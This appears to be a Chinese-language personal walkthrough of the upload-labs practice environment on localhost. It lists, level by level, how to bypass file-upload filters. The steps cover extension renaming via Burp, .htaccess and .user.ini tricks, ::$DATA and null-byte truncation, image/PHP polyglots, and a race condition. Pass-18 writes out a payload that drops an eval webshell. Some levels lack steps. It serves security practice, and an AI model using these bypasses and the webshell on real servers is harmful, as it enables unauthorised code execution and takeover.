Pass-1
2、上传1.jpg抓包,将后改为php,放行
上传成功
3、右键,在新标签页打开图像,即可查看上传的木马
Pass-2
1、与第一关步骤一样,可参考第一关
Pass-3
1、将文件名修改为1.php5
2、上传后右键,在新标签页打开图像
3、使用蚁剑连接
Pass-4
1、创建一个.htaccess文件,里面输入内容<FilesMatch "1.jpg">
SetHandler application/x-httpd-php</FilesMatch>
2、先上传.htaccess文件,再上传1.jpg,图片右键新建标签页打开图片
Pass-5
1、创建一个.user.ini文件,输入内容auto_prepend_file = "1.jpg"
2、先上传.user,ini文件,再上传1.jpg,访问 http://127.0.0.1/upload/upload/readme.php
Pass-6
2、上传后右键,在新标签页打开图像
Pass-7
2、上传成功,点击右键在新标签页打开图像
Pass-8
2、右键,在新标签页打开图像
Pass-9
1、上传1.php抓包,将1.php后面加::$DATA,放行
上传后点击右键,发现页面403
将后缀::$DATA去掉即可
Pass-10
1上传1.php文件抓包,1.php后面加.空格. 放行
2、上传后右键,在新标签页打开图像
Pass-11
1、将1.php改为1.pphphp
2、上传1.pphphp文件,图片右键新建标签页打开图片
Pass-12
1、上传1.php文件抓包,将/upload/后面添加随便一个php文件%00,1.php改为1.jpg 放行
2、图片右键新建标签页打开图片,删掉�/9320240830163621.jpg访问
Pass-13
1、上传1.php文件抓包,将/upload/后面添加随便一个php文件加空格,1.php改为1.jpg
2、打开Hex,将6.php后面的空格对应的20改为00,放行
3、图片右键新建标签页打开图片,删掉�/5320240830164829.jpg访问
Pass-14
1、将一张图片和一个php文件放在cmd根目录,运行copy a.jpg/b+1.php/a shell.jpg
2、上传shell.jpg,图片右键新建标签页打开图片,打开文件包含漏洞,用file读取图片地址
Pass-15
1、上传shell.jpg,图片右键新建标签页打开图片,打开文件包含漏洞,用file读取图片地址
Pass-16
环境问题,无法进行测试
Pass-17
1、图片需要二次渲染,上传图片,图片右键新建标签页打开图片,打开文件包含漏洞,用file读取图片地址
2、复制地址去蚁剑连接
Pass-18
1、php文件输入<?php fputs(fopen('webshell.php','w'),'<?php @eval($_POST["cmd"])?>');?>
2、上传文件,burp抓包,发送到 intruder 模块,设置⽆限发送空的payloads,无限重复;
3、访问1.php抓包,发送到 intruder 模块,设置⽆限发送空的payloads,无限重复;
4、同时攻击,直到出现webshell.php
5、访问webshell.php,使用蚁剑连接
Pass-20
1、上传php文件,保存名称改为1.php/.
2、图片右键新建标签页打开图片